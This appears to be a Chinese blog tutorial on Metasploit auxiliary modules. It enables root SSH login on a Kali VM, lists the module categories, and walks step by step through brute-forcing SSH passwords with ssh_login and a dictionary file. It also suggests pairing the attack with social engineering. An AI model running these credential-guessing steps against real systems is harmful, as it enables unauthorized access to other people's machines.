1. 程式人生 > >Metasploit終端下的輔助掃描工具 (auxiliary模組講解)

Metasploit終端下的輔助掃描工具 (auxiliary模組講解)

(輔助掃描工具主要用於網路攻防前期的踩點、資訊蒐集)

一、操作環境

虛擬機器Kali(IP:192.168.1.92)
# 為方便學習開啟ssh埠

# 進入ssh配置檔案 
》》vi /etc/ssh/sshd_config
    將#PasswordAuthentication no的註釋去掉,並且將NO修改為YES (//kali中預設是yes)
    將PermitRootLogin without-password修改為
PermitRootLogin yes 
# 儲存退出
》》service ssh start(啟動ssh服務)

二、步驟瞭解

1.檢視模組
# 啟動msf
》》msfconsole 》》use auxiliary/【使用auxiliary模組,按兩下Tab鍵,可以看到該模組下所有的可用模組項】
[由於模組太多,我直接整理以下項:]
/admin/android  ~
/admin/http     ~
/admin/mysql/   ~
/admin/oracle/  ~
/admin/vmware/  ~
/admin/smb/ ~
/dos/android/   ~
/dos/http/  ~
/dos/cisco/ ~
/dos/dns/   ~
/dos/smb/   ~
/dos/windows/ftp/   ~
/fuzzers/http/  ~
/fuzzers/smb/   ~
/gather/    ~
/scanner/
portscan/ ~ /scanner/ftp/ ~ /scanner/http/ ~ /scanner/ssh/ ~ /scanner/smb/ ~ /scanner/vmware/ ~ /scanner/vnc/ ~ /scanner/telnet/~ /scanner/msyql/ ~ /scanner/ntp/ ~ /scanner/openvas/ ~ /scanner/sap/ ~ /server/ ~
[以下為主要的嗅探模組]
Port scan:  auxiliary/scanner/portscan/syn
Smb scan:   auxiliary/scanner/smb/smb_version
Ftp scan:   auxiliary/scanner/ftp/ftp_login
Ssh scan:   auxiliary/scanner/ssh/ssh_login
SQLServer:
auxiliary/scanner/mysql/mysql_login&mysql_hashdump……
2.呼叫模組

[這裡我拿嗅探掃描中的ssh模組來舉例,瞭解大致怎麼用]

# 呼叫auxiliary下的ssh模組
》》use /auxiliary/scanner/ssh/ssh_login
3.模組引數檢視、設定
》》options

這裡寫圖片描述
[其中Required中的yes是必須設定的]

》》set RHOSTS 192.168.1.92   (設定目標IP)
》》set USERNAME root    (設定ssh登陸賬戶)
》》set PASS_FILE /kevin/ssh_passwd.txt   (設定暴力字典)
》》set THREADS 100           (執行緒設定為100)
》》options                   (檢視更改後的引數)

這裡寫圖片描述

4.發起攻擊
》》exploit

這裡寫圖片描述
【以上可以看出被攻擊者的ssh登陸賬戶密碼,密碼破解的難易程度取決於密碼字典的廣度,一般還是結合社工來實現完美破解的】

【以上對輔助掃描工具auxiliary模組的講解!網路攻防的世界裡只有技術高低,沒有其它!】